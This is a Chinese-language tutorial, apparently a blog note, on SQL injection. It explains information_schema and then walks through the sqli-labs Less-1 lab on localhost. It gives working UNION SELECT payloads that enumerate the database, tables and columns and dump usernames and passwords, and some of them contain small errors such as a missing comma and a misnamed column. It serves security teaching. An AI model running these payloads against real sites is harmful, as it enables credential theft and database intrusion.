SQL注入
原理
SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者
是判断,前端传入的 参数是攻击者可以控制,并且参数带入数据库的查
询,攻击者可以通过构造恶意的 sql 语句来 实现对数据库的任意操作。
条件
>A:参数用户可控:前端传入的参数内容由用户控制
>B:参数带入数据库的查询:传入的参数拼接到 SQL 语句,
并且带入数据库的查询 (连接到数据库)
>C:对用户输入的数据没有做合法性的判断
说明
1.information_schema
>在 MySQL5.0 版本后,MySQL 默认在数据库中存放一个“information_schema”的 数据库,在
>该库中,我们需要记住三个表名,分别是 schemata,tables,columns。
>**Schemata 表**存储的是该用户创建的所有数据库的库名,需要记住该表中记录数据 库名的字段名为 schema_name。
>**Tables 表**存储该用户创建的所有数据库的库名和表名,要记住该表中记录数据库 库名和表名的字段分别是 table_schema 和 table_name.
>**Columns 表**存储该用户创建的所有数据库的库名、表名、字段名,要记住该表中 记录数据库库名、表名、字段名为 table_schema、table_name、columns_name。
- Limit 的用法
Limit 的使用格式是 limit m,n,其中 m 指的是记录开始的位置,从 m=0 开始,表示第一条记录; n 是指取几条记录。
3.注释符号 三种注释符号:
1. #
2. --空格 空格可以使用+代替 (url 编码%23 表示注释)
3. /*!*/
流程
举例说明:
网址:http://127.0.0.1/sqli/Less-1/?id=1
第一步:判断是否存在sql注入漏洞
1.http://127.0.0.1/sqli/Less-1/?id=1' 错误
2.http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 返回正常结果
3.http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 返回正常这里可以判断是字符型,那么构造字符型注入的payload
2.http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+ 正常
3.http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+ 异常
从而可以判断此处存在sql注入漏洞,切注入漏洞类型为字符型
第二步:判断数据表字段数
order by 1-99
http://127.0.0.1/sqli/Less-1/?id=1' order by 1 --+
第三步:判处查询输出的位置
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+
第四步:脱库,爆数据库表名 security
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,database() --+
第五步:爆表名 emails,referers,uagents,users
http://127.0.0.1/sqli/Less-1/?id=-1'
union select 1,2(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
第六步:爆字段名 id,username,password
http://127.0.0.1/sqli/Less-1/?id=-1'
union select 1,2,(select
group_concat(column_name) from
information_schema.columns where
table_schema='security' and table_name='users') --+
第七步:爆数据值
http://127.0.0.1/sqli/Less-1/?id=-1'
union select 1,2,(select
group_concat(id,0x3a,username,0x3a,password) from
security.users) --+
总结
第一步:判断是否存在sql漏洞
第二步:判断数据表的字段数
第三步:判断查询输出的位置
第四步:脱库,爆数据库名
第五步:爆表名
第六步:爆字段名
第七步:爆数据值
317
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
